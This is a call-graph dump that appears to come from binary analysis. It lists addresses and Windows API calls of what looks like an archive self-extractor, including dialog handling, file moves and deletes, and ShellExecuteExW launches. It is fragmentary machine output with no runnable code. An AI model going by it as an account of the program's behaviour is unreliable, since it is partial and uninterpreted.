22892 16a0e3 22982 1512c2 GetDlgItem ShowWindow 22892->22982 22973 1594f1 22894->22973 22895 16a4a7 22895->22854 22896->22854 22896->22882 22896->22890 22897->22865 22901 16a3cb DialogBoxParamW 22897->22901 22899 169edc 22903 153f5b _swprintf 51 API calls 22899->22903 22904 16a082 22900->22904 22901->22865 22901->22926 22902 16a0ed 22905 15d142 54 API calls 22902->22905 22906 169efe CreateFileMappingW 22903->22906 22907 153f5b _swprintf 51 API calls 22904->22907 22909 16a0f7 SetDlgItemTextW 22905->22909 22910 169f60 GetCommandLineW 22906->22910 22943 169fdd __vswprintf_c_l 22906->22943 22911 16a0a0 22907->22911 22983 1512c2 GetDlgItem ShowWindow 22909->22983 22915 169f71 22910->22915 22922 15d142 54 API calls 22911->22922 22912 169e6a 22916 169e71 GetLastError 22912->22916 22917 169e78 22912->22917 22913 169fe8 ShellExecuteExW 22938 16a005 22913->22938 23063 1697e4 SHGetMalloc 22915->23063 22916->22917 22918 159437 72 API calls 22917->22918 22918->22875 22919 16a10b SetDlgItemTextW GetDlgItem 22923 16a124 GetWindowLongW SetWindowLongW 22919->22923 22924 16a13c 22919->22924 22921 169f8d 23064 1697e4 SHGetMalloc 22921->23064 22922->22926 22923->22924 22984 16aa45 22924->22984 22926->22806 22926->22853 22929 169f99 23065 1697e4 SHGetMalloc 22929->23065 22930 16aa45 91 API calls 22933 16a158 22930->22933 22932 16a048 22932->22887 22937 16a05e UnmapViewOfFile CloseHandle 22932->22937 23009 16bc78 22933->23009 22934 169fa5 23066 15dfde 73 API calls ___scrt_get_show_window_mode 22934->23066 22937->22887 22938->22932 22941 16a034 Sleep 22938->22941 22940 169fbc MapViewOfFile 22940->22943 22941->22932 22941->22938 22943->22913 22949 1512f0 22948->22949 22950 151349 22948->22950 22952 151356 22949->22952 23072 15ced7 22949->23072 23090 15ceb0 GetWindowLongW SetWindowLongW 22950->23090 22952->22792 22952->22793 22952->22853 22955 151325 GetDlgItem 22955->22952 22956 151335 22955->22956 22956->22952 22957 15133b SetWindowTextW 22956->22957 22957->22952 22959 16b76a SendMessageW SendMessageW 22958->22959 22960 16b73a 22958->22960 22961 16b7a2 22959->22961 22962 16b7c1 SendMessageW SendMessageW SendMessageW 22959->22962 22963 16b745 ShowWindow SendMessageW SendMessageW 22960->22963 22961->22962 22964 16b7ec SendMessageW 22962->22964 22965 16b80b SendMessageW 22962->22965 22963->22959 22964->22965 22965->22838 22968 159cd8 22966->22968 22967 159d69 22969 159e86 9 API calls 22967->22969 22971 159d92 22967->22971 22968->22967 22968->22971 23094 159e86 22968->23094 22969->22971 22971->22855 22971->22856 22972->22862 22974 1594fb 22973->22974 22975 159565 CreateFileW 22974->22975 22976 159559 22974->22976 22975->22976 22977 15b275 2 API calls 22976->22977 22979 1595b7 22976->22979 22978 15959e 22977->22978 22978->22979 22980 1595a2 CreateFileW 22978->22980 22979->22912 22980->22979 22981->22892 22982->22902 22983->22919 22985 16aa4f __EH_prolog 22984->22985 22986 16a14a 22985->22986 23126 1696ec 22985->23126 22986->22930 22989 1696ec ExpandEnvironmentStringsW 22998 16aa86 _wcsrchr 22989->22998 22990 16ad86 SetWindowTextW 22990->22998 22995 16ab77 SetFileAttributesW 22997 16ac32 GetFileAttributesW 22995->22997 23006 16ab6a ___scrt_get_show_window_mode 22995->23006 23000 16ac40 DeleteFileW 22997->23000 22997->23006 22998->22986 22998->22989 22998->22990 23002 16af50 GetDlgItem SetWindowTextW SendMessageW 22998->23002 23004 16af92 SendMessageW 22998->23004 22998->23006 23130 160b12 CompareStringW 22998->23130 23131 168b8e GetCurrentDirectoryW 22998->23131 23132 15a1a9 7 API calls 22998->23132 23135 15a132 FindClose 22998->23135 23136 169844 69 API calls new 22998->23136 23137 1720de 22998->23137 23000->23006 23002->22998 23003 153f5b _swprintf 51 API calls 23005 16ac75 GetFileAttributesW 23003->23005 23004->22998 23005->23006 23007 16ac86 MoveFileW 23005->23007 23006->22995 23006->22997 23006->22998 23006->23003 23133 15b100 52 API calls 2 library calls 23006->23133 23134 15a1a9 7 API calls 23006->23134 23007->23006 23008 16ac9e MoveFileExW 23007->23008 23008->23006 23010 16bc82 __EH_prolog 23009->23010 23152 15f165 69 API calls 23010->23152 23012 16bcb3 23153 155bb7 69 API calls 23012->23153 23014 16bcd1 23154 157b10 74 API calls 2 library calls 23014->23154 23016 16bd15 23155 157c84 23016->23155 23018 16bd24 23164 157ba0 23018->23164 23022 16b8c9 23021->23022 23023 168ac0 6 API calls 23022->23023 23024 16b8ce 23023->23024 23025 16b8d6 GetWindow 23024->23025 23026 16a236 23024->23026 23025->23026 23029 16b8f2 23025->23029 23026->22799 23026->22800 23027 16b8ff GetClassNameW 23681 160b12 CompareStringW 23027->23681 23029->23026 23029->23027 23030 16b927 GetWindowLongW 23029->23030 23031 16b988 GetWindow 23029->23031 23030->23031 23032 16b937 SendMessageW 23030->23032 23031->23026 23031->23029 23032->23031 23033 16b94d GetObjectW 23032->23033 23682 168b22 GetDC GetDeviceCaps ReleaseDC 23033->23682 23036 16b962 23683 168adf GetDC GetDeviceCaps ReleaseDC 23036->23683 23684 168cf3 8 API calls ___scrt_get_show_window_mode 23036->23684 23038 16b972 SendMessageW DeleteObject 23038->23031 23039->22812 23041 168fe9 23040->23041 23047 16900e 23040->23047 23685 160b12 CompareStringW 23041->23685 23043 169013 SHAutoComplete 23044 16901c 23043->23044 23048 169485 23044->23048 23045 168ffc 23046 169000 FindWindowExW 23045->23046 23045->23047 23046->23047 23047->23043 23047->23044 23049 16948f __EH_prolog 23048->23049 23050 15137e 75 API calls 23049->23050 23051 1694b1 23050->23051 23686 151edd 23051->23686 23054 1694da 23056 1518f6 127 API calls 23054->23056 23055 1694cb 23057 15162e 79 API calls 23055->23057 23059 1694fc __vswprintf_c_l new 23056->23059 23058 1694d6 23057->23058 23058->22842 23058->22847 23060 15162e 79 API calls 23059->23060 23060->23058 23061->22825 23062->22899 23063->22921 23064->22929 23065->22934 23066->22940 23068->22878 23069->22895 23070->22871 23071->22864 23091 15c88e 23072->23091 23074 15cefd GetWindowRect GetClientRect 23075 15cff2 23074->23075 23080 15cf57 23074->23080 23076 15d034 GetSystemMetrics GetWindow 23075->23076 23077 15cffc GetWindowTextW 23075->23077 23083 15d054 23076->23083 23078 15c91f 52 API calls 23077->23078 23079 15d028 SetWindowTextW 23078->23079 23079->23076 23080->23076 23081 15cfb8 GetWindowLongW 23080->23081 23085 15cfe2 GetWindowRect 23081->23085 23082 151312 23082->22952 23082->22955 23083->23082 23084 15d060 GetWindowTextW 23083->23084 23086 15c91f 52 API calls 23083->23086 23087 15d0a6 GetWindowRect 23083->23087 23088 15d11b GetWindow 23083->23088 23084->23083 23085->23075 23089 15d093 SetWindowTextW 23086->23089 23087->23088 23088->23082 23088->23083 23089->23083 23090->22952 23092 15c91f 52 API calls 23091->23092 23093 15c8b6 _wcschr 23092->23093 23093->23074 23095 159e93 23094->23095 23096 159eb7 23095->23096 23098 159eaa CreateDirectoryW 23095->23098 23115 159dff 23096->23115 23098->23096 23100 159eea 23098->23100 23104 159ef9 23100->23104 23107 15a0c3 23100->23107 23101 159efd GetLastError 23101->23104 23102 15b275 2 API calls 23105 159ed3 23102->23105 23104->22968 23105->23101 23106 159ed7 CreateDirectoryW 23105->23106 23106->23100 23106->23101 23108 16cec0 23107->23108 23109 15a0d0 SetFileAttributesW 23108->23109 23110 15a0e6 23109->23110 23111 15a113 23109->23111 23112 15b275 2 API calls 23110->23112 23111->23104 23113 15a0fa 23112->23113 23113->23111 23114 15a0fe SetFileAttributesW 23113->23114 23114->23111 23118 159e13 23115->23118 23119 16cec0 23118->23119 23120 159e20 GetFileAttributesW 23119->23120 23121 159e31 23120->23121 23122 159e08 23120->23122 23123 15b275 2 API calls 23121->23123 23122->23101 23122->23102 23124 159e45 23123->23124 23124->23122 23125 159e49 GetFileAttributesW 23124->23125 23125->23122 23127 1696f6 23126->23127 23128 1697cc 23127->23128 23129 1697a9 ExpandEnvironmentStringsW 23127->23129 23128->22998 23129->23128 23130->22998 23131->22998 23132->22998 23133->23006 23134->23006 23135->22998 23136->22998 23138 175aea 23137->23138 23139 175af7 23138->23139 23140 175b02 23138->23140 23142 1759fc __vswprintf_c_l 21 API calls 23139->23142 23141 175b0a 23140->23141 23148 175b13 __CreateFrameInfo 23140->23148 23143 1759c2 _free 20 API calls 23141->23143 23146 175aff 23142->23146 23143->23146 23144 175b3d HeapReAlloc 23144->23146 23144->23148 23145 175b18 23150 175e3e 20 API calls _abort 23145->23150 23146->22998 23148->23144 23148->23145 23151 1746ca 7 API calls 2 library calls 23148->23151 23150->23146 23151->23148 23152->23012 23153->23014 23154->23016 23156 157c8e 23155->23156 23161 157cf8 23156->23161 23190 15a145 23156->23190 23158 157da4 23158->23018 23160 157d62 23160->23158 23196 156d0d 67 API calls 23160->23196 23161->23160 23162 15a145 8 API calls 23161->23162 23168 15820b 23161->23168 23162->23161 23165 157bae 23164->23165 23167 157bb5 23164->23167 23166 160e21 79 API calls 23165->23166 23166->23167 23169 158215 __EH_prolog 23168->23169 23197 15137e 23169->23197 23171 158230 23205 159ba2 23171->23205 23177 15825f 23325 15162e 23177->23325 23178 1582fa 23224 1583a3 23178->23224 23182 15835a 23228 151e8e 23182->23228 23185 15825b 23185->23177 23185->23178 23188 15a145 8 API calls 23185->23188 23329 15b6cb CompareStringW 23185->23329 23186 158365 23186->23177 23232 153a20 23186->23232 23242 158409 23186->23242 23188->23185 23191 15a15a 23190->23191 23195 15a15e 23191->23195 23669 15a273 23191->23669 23193 15a16e 23194 15a173 FindClose 23193->23194 23193->23195 23194->23195 23195->23156 23196->23158 23198 151383 __EH_prolog 23197->23198 23331 15c413 23198->23331 23200 1513ba 23204 151413 ___scrt_get_show_window_mode 23200->23204 23337 16cdae 23200->23337 23204->23171 23206 159bad 23205->23206 23207 158246 23206->23207 23362 156e66 67 API calls 23206->23362 23207->23177 23209 1519b1 23207->23209 23210 1519bb __EH_prolog 23209->23210 23217 1519fd 23210->23217 23223 1519e4 23210->23223 23363 15135c 23210->23363 23212 151b16 23366 156d0d 67 API calls 23212->23366 23214 153a20 90 API calls 23219 151b6d 23214->23219 23215 151b26 23215->23214 23215->23223 23216 151bb7 23222 151bea 23216->23222 23216->23223 23367 156d0d 67 API calls 23216->23367 23217->23212 23217->23215 23217->23223 23219->23216 23220 153a20 90 API calls 23219->23220 23220->23219 23221 153a20 90 API calls 23221->23222 23222->23221 23222->23223 23223->23185 23225 1583b0 23224->23225 23385 15ffb8 GetSystemTime SystemTimeToFileTime 23225->23385 23227 158314 23227->23182 23330 1606c8 65 API calls 23227->23330 23230 151e93 __EH_prolog 23228->23230 23229 151ec7 23229->23186 23230->23229 23387 1518f6 23230->23387 23233 153a30 23232->23233 23234 153a2c 23232->23234 23235 153a5d 23233->23235 23236 153a4f 23233->23236 23234->23186 23605 15276c 90 API calls 3 library calls 23235->23605 23239 153a8f 23236->23239 23604 153203 78 API calls 3 library calls 23236->23604 23239->23186 23240 153a5b 23240->23239 23606 151fd2 67 API calls 23240->23606 23243 158413 __EH_prolog 23242->23243 23244 15844f 23243->23244 23274 158453 23243->23274 23635 1677e7 93 API calls 23243->23635 23245 158478 23244->23245 23250 1584ff 23244->23250 23244->23274 23247 15849a 23245->23247 23245->23274 23636 157a2f 151 API calls 23245->23636 23247->23274 23637 1677e7 93 API calls 23247->23637 23250->23274 23607 155d98 23250->23607 23252 15858c 23252->23274 23615 1580f8 23252->23615 23255 1586e9 23256 15a145 8 API calls 23255->23256 23257 15874d 23255->23257 23256->23257 23619 157c11 23257->23619 23259 15c57d 73 API calls 23262 1587a7 _memcmp 23259->23262 23260 1588d1 23261 1589a0 23260->23261 23268 15891f 23260->23268 23266 1589fb 23261->23266 23278 1589ab 23261->23278 23262->23259 23262->23260 23263 1588ca 23262->23263 23262->23274 23638 1580a6 75 API calls 23262->23638 23639 156d0d 67 API calls 23262->23639 23640 156d0d 67 API calls 23263->23640 23276 15898f 23266->23276 23643 157f88 89 API calls 23266->23643 23267 1589f9 23269 159437 72 API calls 23267->23269 23270 159dff 4 API calls 23268->23270 23268->23276 23269->23274 23275 158956 23270->23275 23271 159437 72 API calls 23271->23274 23273 158a64 23277 15971a GetFileType 23273->23277 23289 158acd 23273->23289 23321 158fb5 23273->23321 23274->23186 23275->23276 23641 159161 89 API calls 23275->23641 23276->23267 23276->23273 23280 158aa5 23277->23280 23278->23267 23642 157dc4 93 API calls ___InternalCxxFrameHandler 23278->23642 23279 15a6a9 8 API calls 23282 158b1c 23279->23282 23280->23289 23644 151f18 67 API calls 23280->23644 23284 15a6a9 8 API calls 23282->23284 23288 158b32 23284->23288 23286 158abb 23645 156f67 68 API calls 23286->23645 23290 158bd5 23288->23290 23625 159869 23288->23625 23289->23279 23291 158d22 23290->23291 23292 158c1e 23290->23292 23297 158d34 23291->23297 23298 158d48 23291->23298 23314 158c4e 23291->23314 23293 158c8e 23292->23293 23296 158c2e 23292->23296 23295 1580f8 CharUpperW 23293->23295 23300 158ca9 23295->23300 23301 158c72 23296->23301 23306 158c3c 23296->23306 23302 1590d0 120 API calls 23297->23302 23299 161fa9 68 API calls 23298->23299 23303 158d61 23299->23303 23307 158cd2 23300->23307 23308 158cd9 23300->23308 23300->23314 23301->23314 23647 1577d4 101 API calls 23301->23647 23302->23314 23304 161c40 120 API calls 23303->23304 23304->23314 23646 151f18 67 API calls 23306->23646 23648 157586 77 API calls ___InternalCxxFrameHandler 23307->23648 23649 15900e 85 API calls __EH_prolog 23308->23649 23312 158e6c 23313 158edb 23312->23313 23312->23321 23651 159b6a SetEndOfFile 23312->23651 23630 159a12 23313->23630 23314->23312 23650 151f18 67 API calls 23314->23650 23318 158f35 23319 1594a3 68 API calls 23318->23319 23320 158f40 23319->23320 23320->23321 23322 15a0c3 4 API calls 23320->23322 23321->23271 23323 158f9f 23322->23323 23323->23321 23652 151f18 67 API calls 23323->23652 23326 151640 23325->23326 23668 15c4b6 79 API calls 23326->23668 23329->23185 23330->23182 23332 15c41d __EH_prolog 23331->23332 23333 16cdae new 8 API calls 23332->23333 23334 15c460 23333->23334 23335 16cdae new 8 API calls 23334->23335 23336 15c484 23335->23336 23336->23200 23338 16cdb3 new 23337->23338 23339 151400 23338->23339 23349 1746ca 7 API calls 2 library calls 23338->23349 23350 16d83a RaiseException CallUnexpected new 23338->23350 23351 16d81d RaiseException Concurrency::cancel_current_task CallUnexpected 23338->23351 23339->23204 23343 15ac66 23339->23343 23344 15ac70 __EH_prolog 23343->23344 23352 15ddc2 73 API calls 23344->23352 23346 15ac82 23353 15ad7e 23346->23353 23349->23338 23352->23346 23354 15ad90 ___scrt_get_show_window_mode 23353->23354 23357 15fce6 23354->23357 23360 15fca6 GetCurrentProcess GetProcessAffinityMask 23357->23360 23361 15acf8 23360->23361 23361->23204 23362->23207 23368 151705 23363->23368 23365 151378 23365->23217 23366->23223 23367->23222 23369 15171b 23368->23369 23380 151773 __vswprintf_c_l 23368->23380 23370 151744 23369->23370 23381 156dd3 67 API calls __vswprintf_c_l 23369->23381 23372 151760 new 23370->23372 23373 15179a 23370->23373 23372->23380 23383 156e0b 68 API calls 23372->23383 23375 1720de 22 API calls 23373->23375 23374 15173a 23382 156e0b 68 API calls 23374->23382 23377 1517a1 23375->23377 23377->23380 23384 156e0b 68 API calls 23377->23384 23380->23365 23381->23374 23382->23370 23383->23380 23384->23380 23386 15ffe8 __vswprintf_c_l 23385->23386 23386->23227 23388 1518fb __EH_prolog 23387->23388 23389 151934 23388->23389 23391 151964 23388->23391 23394 15190f 23388->23394 23390 153a20 90 API calls 23389->23390 23390->23394 23396 153e69 23391->23396 23394->23229 23400 153e72 23396->23400 23397 153a20 90 API calls 23397->23400 23398 151980 23398->23394 23401 151da1 23398->23401 23400->23397 23400->23398 23413 15f8f2 23400->23413 23402 151dab __EH_prolog 23401->23402 23421 153aa3 23402->23421 23404 151dd4 23405 151705 69 API calls 23404->23405 23407 151e5b 23404->23407 23406 151deb 23405->23406 23451 15187c 69 API calls 23406->23451 23407->23394 23409 151e03 23411 151e0f 23409->23411 23452 1606e9 MultiByteToWideChar 23409->23452 23453 15187c 69 API calls 23411->23453 23414 15f8f9 23413->23414 23415 15f914 23414->23415 23419 156dce RaiseException CallUnexpected 23414->23419 23417 15f925 SetThreadExecutionState 23415->23417 23420 156dce RaiseException CallUnexpected 23415->23420 23417->23400 23419->23415 23420->23417 23422 153aad __EH_prolog 23421->23422 23423 153ac3 23422->23423 23424 153adf 23422->23424 23490 156d0d 67 API calls 23423->23490 23426 153d1f 23424->23426 23429 153b0b 23424->23429 23509 156d0d 67 API calls 23426->23509 23427 153ace 23427->23404 23429->23427 23454 160be0 23429->23454 23431 153b43 23458 161fa9 23431->23458 23433 153b8c 23434 153c17 23433->23434 23450 153b83 23433->23450 23493 15c57d 23433->23493 23471 15a6a9 23434->23471 23435 153b88 23435->23433 23492 151fb8 69 API calls 23435->23492 23437 153b5a 23437->23433 23437->23435 23438 153b78 23437->23438 23491 156d0d 67 API calls 23438->23491 23440 153c2a 23444 153ca5 23440->23444 23445 153c9b 23440->23445 23499 161c40 23444->23499 23475 1590d0 23445->23475 23448 153ca3 23448->23450 23508 151f18 67 API calls 23448->23508 23486 160e21 23450->23486 23451->23409 23452->23411 23453->23407 23455 160bea __EH_prolog 23454->23455 23510 15fb02 23455->23510 23457 160cea 23457->23431 23459 161fb8 23458->23459 23461 161fc2 23458->23461 23529 156e0b 68 API calls 23459->23529 23462 162002 23461->23462 23464 162007 new 23461->23464 23470 162060 ___scrt_get_show_window_mode 23461->23470 23531 1700ca RaiseException 23462->23531 23463 162117 23532 1700ca RaiseException 23463->23532 23464->23463 23467 16203c 23464->23467 23464->23470 23530 161eca 68 API calls 3 library calls 23467->23530 23468 16213a 23470->23437 23472 15a6b6 23471->23472 23474 15a6c0 23471->23474 23473 16cdae new 8 API calls 23472->23473 23473->23474 23474->23440 23476 1590da __EH_prolog 23475->23476 23533 157c6b 23476->23533 23479 15135c 69 API calls 23480 1590ec 23479->23480 23536 15c658 23480->23536 23482 159146 23482->23448 23484 15c658 115 API calls 23485 1590fe 23484->23485 23485->23482 23485->23484 23545 15c810 91 API calls __vswprintf_c_l 23485->23545 23488 160e43 23486->23488 23552 15fc30 23488->23552 23489 160e5c 23489->23427 23490->23427 23491->23450 23492->23433 23494 15c5b0 23493->23494 23495 15c59e 23493->23495 23569 156195 73 API calls 23494->23569 23568 156195 73 API calls 23495->23568 23498 15c5a8 23498->23434 23500 161c49 23499->23500 23502 161c72 23499->23502 23501 161c66 23500->23501 23504 161c68 23500->23504 23505 161c5e 23500->23505 23501->23448 23502->23501 23584 16421d 120 API calls 2 library calls 23502->23584 23583 164f35 115 API calls 23504->23583 23570 165984 23505->23570 23508->23450 23509->23427 23526 16cdf0 23510->23526 23512 15fb0c EnterCriticalSection 23513 15fb30 23512->23513 23523 15fb4e 23512->23523 23514 16cdae new 8 API calls 23513->23514 23518 15fb3a 23514->23518 23515 15fb95 LeaveCriticalSection 23517 15fba1 23515->23517 23516 15fb66 23519 16cdae new 8 API calls 23516->23519 23517->23457 23518->23523 23527 15f930 71 API calls 23518->23527 23520 15fb70 23519->23520 23521 15fb8a LeaveCriticalSection 23520->23521 23528 15f930 71 API calls 23520->23528 23521->23517 23523->23515 23523->23516 23525 15fb88 23525->23521 23526->23512 23527->23523 23528->23525 23529->23461 23530->23470 23531->23463 23532->23468 23534 15a8e0 GetVersionExW 23533->23534 23535 157c70 23534->23535 23535->23479 23541 15c66d __vswprintf_c_l 23536->23541 23537 15c7b7 23538 15c7df 23537->23538 23546 15c5f7 23537->23546 23540 15f8f2 2 API calls 23538->23540 23543 15c7ae 23540->23543 23541->23537 23541->23543 23550 15a791 85 API calls 23541->23550 23551 1677e7 93 API calls 23541->23551 23543->23485 23545->23485 23547 15c600 23546->23547 23549 15c651 23546->23549 23548 160680 PeekMessageW GetMessageW TranslateMessage DispatchMessageW SendDlgItemMessageW 23547->23548 23547->23549 23548->23549 23549->23538 23550->23541 23551->23541 23553 15fca2 23552->23553 23554 15fc39 EnterCriticalSection 23552->23554 23553->23489 23555 15fc75 23554->23555 23559 15fc57 23554->23559 23556 15f9d1 77 API calls 23555->23556 23557 15fc98 LeaveCriticalSection 23555->23557 23558 15fc8f 23556->23558 23557->23553 23558->23557 23559->23555 23561 15f9d1 23559->23561 23562 15fdc9 72 API calls 23561->23562 23563 15f9f3 ReleaseSemaphore 23562->23563 23564 15fa31 DeleteCriticalSection CloseHandle CloseHandle 23563->23564 23565 15fa13 23563->23565 23564->23555 23566 15fac7 70 API calls 23565->23566 23567 15fa1d CloseHandle 23566->23567 23567->23564 23567->23565 23568->23498 23569->23498 23585 1621e6 23570->23585 23572 15c658 115 API calls 23582 165995 ___BuildCatchObject __vswprintf_c_l 23572->23582 23573 165d67 23603 163ef1 92 API calls __vswprintf_c_l 23573->23603 23575 165d77 __vswprintf_c_l 23575->23501 23582->23572 23582->23573 23589 15fa67 23582->23589 23595 162b3a 115 API calls 23582->23595 23596 165db9 115 API calls 23582->23596 23597 15fdc9 23582->23597 23601 162593 92 API calls __vswprintf_c_l 23582->23601 23602 1663f2 120 API calls __vswprintf_c_l 23582->23602 23583->23501 23584->23501 23587 1621f0 __EH_prolog ___scrt_get_show_window_mode new 23585->23587 23586 1622db 23586->23582 23587->23586 23588 156e0b 68 API calls 23587->23588 23588->23587 23590 15fa73 23589->23590 23591 15fa78 23589->23591 23592 15fbb1 77 API calls 23590->23592 23593 15fa91 23591->23593 23594 15fdc9 72 API calls 23591->23594 23592->23591 23593->23582 23594->23593 23595->23582 23596->23582 23598 15fde3 ResetEvent ReleaseSemaphore 23597->23598 23599 15fe0e 23597->23599 23600 15fac7 70 API calls 23598->23600 23599->23582 23600->23599 23601->23582 23602->23582 23603->23575 23604->23240 23605->23240 23606->23239 23608 155da6 23607->23608 23653 155cc5 23608->23653 23610 155e11 23610->23252 23612 155dd9 23612->23610 23613 155e1a 23612->23613 23658 15a950 CharUpperW CompareStringW CompareStringW 23612->23658 23613->23610 23659 15f0e1 CompareStringW 23613->23659 23617 158116 23615->23617 23616 1581b7 CharUpperW 23618 1581ca 23616->23618 23617->23616 23618->23255 23620 157c20 23619->23620 23621 157c60 23620->23621 23665 156f49 67 API calls 23620->23665 23621->23262 23623 157c58 23666 156d0d 67 API calls 23623->23666 23626 159897 2 API calls 23625->23626 23627 15987d 23626->23627 23628 159888 23627->23628 23667 159b6a SetEndOfFile 23627->23667 23628->23290 23631 159a23 23630->23631 23633 159a32 23630->23633 23632 159a29 FlushFileBuffers 23631->23632 23631->23633 23632->23633 23634 159aab SetFileTime 23633->23634 23634->23318 23635->23244 23636->23247 23637->23274 23638->23262 23639->23262 23640->23260 23641->23276 23642->23267 23643->23276 23644->23286 23645->23289 23646->23314 23647->23314 23648->23314 23649->23314 23650->23312 23651->23313 23652->23321 23660 155bc2 23653->23660 23655 155ce6 23655->23612 23657 155bc2 3 API calls 23657->23655 23658->23612 23659->23610 23663 155bcc 23660->23663 23661 155cb4 23661->23655 23661->23657 23663->23661 23664 15a950 CharUpperW CompareStringW CompareStringW 23663->23664 23664->23663 23665->23623 23666->23621 23667->23628 23670 15a27d 23669->23670 23671 15a30d FindNextFileW 23670->23671 23672 15a29b FindFirstFileW 23670->23672 23673 15a32c 23671->23673 23674 15a318 GetLastError 23671->23674 23675 15a2b4 23672->23675 23678 15a2f1 23672->23678 23673->23678 23674->23673 23676 15b275 2 API calls 23675->23676 23677 15a2cd 23676->23677 23679 15a2e6 GetLastError 23677->23679 23680 15a2d1 FindFirstFileW 23677->23680 23678->23193 23679->23678 23680->23678 23680->23679 23681->23029 23682->23036 23683->23036 23684->23038 23685->23045 23687 159ba2 67 API calls 23686->23687 23688 151ee9 23687->23688 23689 1519b1 90 API calls 23688->23689 23692 151eed 23688->23692 23690 151efa 23689->23690 23690->23692 23693 156d0d 67 API calls 23690->23693 23692->23054 23692->23055 23693->23692 23916 16d74a 28 API calls 2 library calls 23709 16b077 23711 16b07c 23709->23711 23720 16aa99 _wcsrchr 23709->23720 23710 1696ec ExpandEnvironmentStringsW 23710->23720 23711->23720 23735 16b9aa 23711->23735 23713 16b642 23715 16ad86 SetWindowTextW 23715->23720 23718 1720de 22 API calls 23718->23720 23720->23710 23720->23713 23720->23715 23720->23718 23721 16ab6a ___scrt_get_show_window_mode 23720->23721 23728 16af50 GetDlgItem SetWindowTextW SendMessageW 23720->23728 23730 16af92 SendMessageW 23720->23730 23734 160b12 CompareStringW 23720->23734 23758 168b8e GetCurrentDirectoryW 23720->23758 23759 15a1a9 7 API calls 23720->23759 23762 15a132 FindClose 23720->23762 23763 169844 69 API calls new 23720->23763 23721->23720 23722 16ab77 SetFileAttributesW 23721->23722 23724 16ac32 GetFileAttributesW 23721->23724 23729 153f5b _swprintf 51 API calls 23721->23729 23760 15b100 52 API calls 2 library calls 23721->23760 23761 15a1a9 7 API calls 23721->23761 23722->23721 23722->23724 23724->23721 23726 16ac40 DeleteFileW 23724->23726 23726->23721 23728->23720 23731 16ac75 GetFileAttributesW 23729->23731 23730->23720 23731->23721 23732 16ac86 MoveFileW 23731->23732 23732->23721 23733 16ac9e MoveFileExW 23732->23733 23733->23721 23734->23720 23737 16b9b4 ___scrt_get_show_window_mode 23735->23737 23736 16bc0c 23736->23720 23737->23736 23738 16ba9f 23737->23738 23764 160b12 CompareStringW 23737->23764 23740 159dff 4 API calls 23738->23740 23741 16bab4 23740->23741 23742 16bad3 ShellExecuteExW 23741->23742 23765 15ae20 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 23741->23765 23742->23736 23749 16bae6 23742->23749 23744 16bacb 23744->23742 23745 16bb21 23766 16be69 WaitForSingleObject PeekMessageW WaitForSingleObject 23745->23766 23746 16bb77 CloseHandle 23747 16bb90 23746->23747 23748 16bb85 23746->23748 23747->23736 23754 16bc07 ShowWindow 23747->23754 23767 160b12 CompareStringW 23748->23767 23749->23745 23749->23746 23751 16bb1b ShowWindow 23749->23751 23751->23745 23753 16bb39 23753->23746 23755 16bb4c GetExitCodeProcess 23753->23755 23754->23736 23755->23746 23756 16bb5f 23755->23756 23756->23746 23758->23720 23759->23720 23760->23721 23761->23721 23762->23720 23763->23720 23764->23738 23765->23744 23766->23753 23767->23747 23917 17d774 IsProcessorFeaturePresent 23918 16d779 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 23831 151067 75 API calls pre_c_initialization 23869 168963 GdipDisposeImage GdipFree ___InternalCxxFrameHandler 23919 171f60 RtlUnwind 21920 177695 21922 1776a0 21920->21922 21923 1776c9 21922->21923 21924 1776c5 21922->21924 21926 1779a7 21922->21926 21933 1776ed DeleteCriticalSection 21923->21933 21934 177735 21926->21934 21929 1779d7 21941 16d783 21929->21941 21930 1779ec InitializeCriticalSectionAndSpinCount 21930->21929 21932 177a03 21932->21922 21933->21924 21935 177761 21934->21935 21936 177765 21934->21936 21935->21936 21939 177785 21935->21939 21948 1777d1 21935->21948 21936->21929 21936->21930 21938 177791 GetProcAddress 21940 1777a1 __crt_fast_encode_pointer 21938->21940 21939->21936 21939->21938 21940->21936 21942 16d78e IsProcessorFeaturePresent 21941->21942 21943 16d78c 21941->21943 21945 16ddb8 21942->21945 21943->21932 21955 16dd7c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 21945->21955 21947 16de9b 21947->21932 21949 1777e7 21948->21949 21950 1777f2 LoadLibraryExW 21948->21950 21949->21935 21951 17780f GetLastError 21950->21951 21952 177827 21950->21952 21951->21952 21953 17781a LoadLibraryExW 21951->21953 21952->21949 21954 17783e FreeLibrary 21952->21954 21953->21952 21954->21949 21955->21947 23896 170e9d 48 API calls 23870 16899a GdipCloneImage GdipAlloc 23898 157a9b GetCurrentProcess GetLastError CloseHandle 23871 169584 GetDlgItem EnableWindow ShowWindow SendMessageW 22780 16c782 22782 16c730 22780->22782 22781 16cabc ___delayLoadHelper2@8 19 API calls 22781->22782 22782->22781 23839 159481 72 API calls 22783 151383 75 API calls 3 library calls 23924 164fb5 120 API calls __vswprintf_c_l 23925 16e7b0 51 API calls 2 library calls 23769 178abc 31 API calls _ValidateLocalCookies 23775 1510a9 23780 155b35 23775->23780 23781 155b3f __EH_prolog 23780->23781 23782 15ac66 75 API calls 23781->23782 23783 155b4b 23782->23783 23787 155d2a GetCurrentProcess GetProcessAffinityMask 23783->23787 23928 16aa99 91 API calls 3 library calls 23903 178aaa GetProcessHeap 23844 167cd5 GetClientRect 23904 174ed4 55 API calls _free 21956 16c0d0 21957 16c0dd 21956->21957 21964 15d142 21957->21964 21965 15d172 21964->21965 21966 15d191 LoadStringW 21965->21966 21967 15d17b LoadStringW 21965->21967 21968 15d1a3 21966->21968 21967->21966 21967->21968 21977 15c91f 21968->21977 21970 15d1b1 21971 153f5b 21970->21971 21987 153f2e 21971->21987 21974 16991e PeekMessageW 21975 16995a 21974->21975 21976 169939 GetMessageW TranslateMessage DispatchMessageW 21974->21976 21976->21975 21978 15c929 21977->21978 21979 15c99d _strlen 21978->21979 21984 15c9fb _wcschr _wcsrchr 21978->21984 21985 160905 WideCharToMultiByte 21978->21985 21986 160905 WideCharToMultiByte 21979->21986 21982 15c9c8 _strlen 21983 153f5b _swprintf 51 API calls 21982->21983 21983->21984 21984->21970 21985->21979 21986->21982 21988 153f45 ___scrt_initialize_default_local_stdio_options 21987->21988 21991 1734dd 21988->21991 21994 1721bb 21991->21994 21995 1721e3 21994->21995 21996 1721fb 21994->21996 22011 175e3e 20 API calls _abort 21995->22011 21996->21995 21998 172203 